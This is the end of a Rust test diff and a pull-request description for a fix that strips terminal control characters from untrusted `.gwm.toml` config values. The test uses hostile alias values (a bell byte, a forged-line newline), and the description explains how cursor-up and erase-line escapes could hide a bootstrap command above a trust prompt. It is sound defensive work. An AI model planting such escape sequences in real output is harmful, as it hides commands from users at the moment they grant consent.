+  // prints its own error and exits without ever reaching the error sink in
+  // `main`. Measured, that is not a hole: clap strips control characters from
+  // the token it quotes, and the expander splits on whitespace so a `\n` in
+  // an expansion becomes a second token rather than a forged output line.
+  //
+  // Pinned rather than trusted, for the same reason `config list`'s `{:?}` is
+  // pinned: the protection belongs to a dependency's rendering choice, so a
+  // clap upgrade that starts echoing argv verbatim has to fail here rather
+  // than ship quietly.
+  let (dir, _repo) = init_repo();
+  for expansion in ["nope\u{7}bell", "nope\ninjected-line"] {
+    fs::write(
+      dir.path().join(".gwm.toml"),
+      format!("[aliases]\nboom = \"{}\"\n", expansion.escape_default()),
+    )
+    .unwrap();
+
+    let out = gwm_in(dir.path()).arg("boom").output().unwrap();
+    let stdout = String::from_utf8_lossy(&out.stdout);
+    let stderr = String::from_utf8_lossy(&out.stderr);
+    assert!(
+      control_bytes(&stdout).is_empty() && control_bytes(&stderr).is_empty(),
+      "an alias expansion reached the terminal through clap: {:?} / {:?}",
+      stdout,
+      stderr
+    );
+  }
+}


### PR DESCRIPTION
## Description

A `.gwm.toml` is data from a repo nobody has vetted, and the commands that read
it back skip the TOFU trust gate on purpose: inspecting an unfamiliar repo
before trusting it is meant to be the safe move. Echoing a config-supplied
string verbatim handed that file a terminal escape channel out of a read-only
command.

Closes #473

## Type of change

- [x] 🐛 Fix (bug fix)

## Changes

Measured against a hostile `.gwm.toml` **before** the fix, each of these put a
raw ESC on the terminal:

| command | site |
|---|---|
| `gwm config get` | the string arm printed the value bare |
| `gwm config list` | the **keys** (`aliases`, `forge_hosts`, `exec`/`clean` profiles, `tui.keys` are maps, so their keys are attacker-chosen) |
| `gwm types` | `description` from `[[branch_types]]`, shortcodes from `[gitmoji]` |
| `gwm aliases list` | repo and user alias names and expansions |
| `gwm doctor` | check details that quote a config value |
| `gwm commit-prefix` | assembled from `[gitmoji]` |
| the TOFU prompt | the bootstrap surface, and the raw body on `show` |
| **any command at all** | `toml`'s parse error quotes the offending source line |

The last two are the ones that matter.

The bootstrap summary renders directly above
`Trust this .gwm.toml? [y/N/show]:`, so a cursor-up-then-erase-line pair in a
`[[bootstrap.command]]` name walks the cursor up and deletes the row naming the
shell it is asking permission to run. The summary whose job is to reveal the
command can be made to hide it.

The parse-error leg needs no echo command at all: running `gwm list` inside the
repo is enough.

Sanitised at each **sink** rather than at each producer. That is what makes the
doctor leg cover checks nobody has written yet, and what makes the two
`eprintln!` in `main` cover every error of every subcommand.

Two variants, because the sinks have two shapes:

- `sanitise_for_terminal`, for rows. Replaces every control character, newlines
  included, so a value cannot forge an extra row in a report read as a list of
  facts.
- `sanitise_block_for_terminal`, for documents. Keeps the line break and the
  tab, which carry the layout, and replaces the rest including the carriage
  return, which would let a value overwrite the line it was printed on.

Sanitising the `show` body is not "breaking raw": an escape sequence buried in
the body defeats the inspection that view exists to provide.

## Where the issue was wrong

#473 names `println!("{} = {}", key, value)` in `config list` as the problem.
The **value** there was never the hole: `format_list_value` renders strings
with `{:?}`, and Rust's `Debug` for `str` escapes control characters. Verified
by running the binary, not by reading the impl. The **key** beside it was raw,
which is the leg that actually needed fixing.

Rather than change that rendering, a test now pins the escaping. The protection
is incidental to a formatting choice, so "simplifying" `{:?}` to `{}` would
reopen the channel silently.

## Deliberately out of scope

- **`labels` / `milestones` diff rows.** Their printers are only reachable
  after a forge round-trip, so there is no test seam without mocking `gh`, and
  this repo does not ship untested behaviour. Label names are already
  control-char-validated at load (`labels::validate_label_name`); milestone
  titles are not, which is worth a follow-up.
- **The bootstrap report** (`lifecycle.rs`, `cli.rs`) runs only once the gate
  has passed or `--allow-bootstrap` was given, so the user has already
  consented to that file.
- **`exec` / `clean` profiles** *execute* config-supplied commands. That is a
  different and larger threat than terminal escapes, and not this PR's.

## Tests

- [x] `cargo test` passes locally: 89 targets, exit 0, under a CI-like minimal
      PATH (`PATH="$(dirname "$(command -v cargo)"):/usr/bin:/bin"`)
- [x] `cargo fmt --check` passes
- [x] `cargo clippy --all-targets -- -D warnings` passes
- [x] New tests added under `tests/terminal_escape_tests.rs`

Five tests, written red before the fix and pinned at the sink rather than at
the call site, so the guarantee survives a new check / row / field upstream:

- `no_ungated_command_replays_a_control_byte_from_the_repo_config`, a table
  over the seven ungated commands, stdout **and** stderr
- `a_neutralised_value_is_still_recognisable_in_the_output`
- `config_list_keeps_escaping_string_values`, the incidental `Debug` pin
- `a_config_parse_error_does_not_replay_the_files_control_bytes`
- `the_pre_trust_bootstrap_summary_neutralises_control_bytes`

One thing the fixture documents: the payload has to travel as TOML's own `\u`
escape, because the parser **refuses** a raw control byte inside a basic
string. A raw byte never becomes a value at all, it produces a parse error
instead, which is exactly why the parse-error leg exists.

## Checklist

- [x] Branch follows `<type>/#<issue>-<description>`
- [x] Commits follow Gitmoji + Conventional Commits
- [x] CHANGELOG.md updated under `## [Unreleased]`
- [ ] README updated if CLI surface changed: no surface change, output only
- [ ] `examples/gwm.toml.example` updated if config schema changed: no schema change
- [x] No `unwrap()` on user-facing paths
- [x] No `println!` in TUI render code. TUI untouched; it already sanitises.

## Linked issues / docs

- Issue: #473
- Related PR: #472 / #415, which fixed the `doctor` / `config validate`
  `branch_pattern` echo and introduced `sanitise_for_terminal`, reused here

## Notes for reviewers

`a6e8eeb` is a pure refactor with no behaviour change: it turns
`print_bootstrap_summary` into `bootstrap_summary_lines` returning
`Vec<String>` so the highest-severity site can be asserted on without driving a
PTY. Otherwise the important half of this PR would have shipped untested.

Widths in `types` and `aliases list` are now measured on the neutralised
strings, because a replaced C1 control character is two bytes narrower than the
one it replaced, so measuring the raw string would skew the columns.
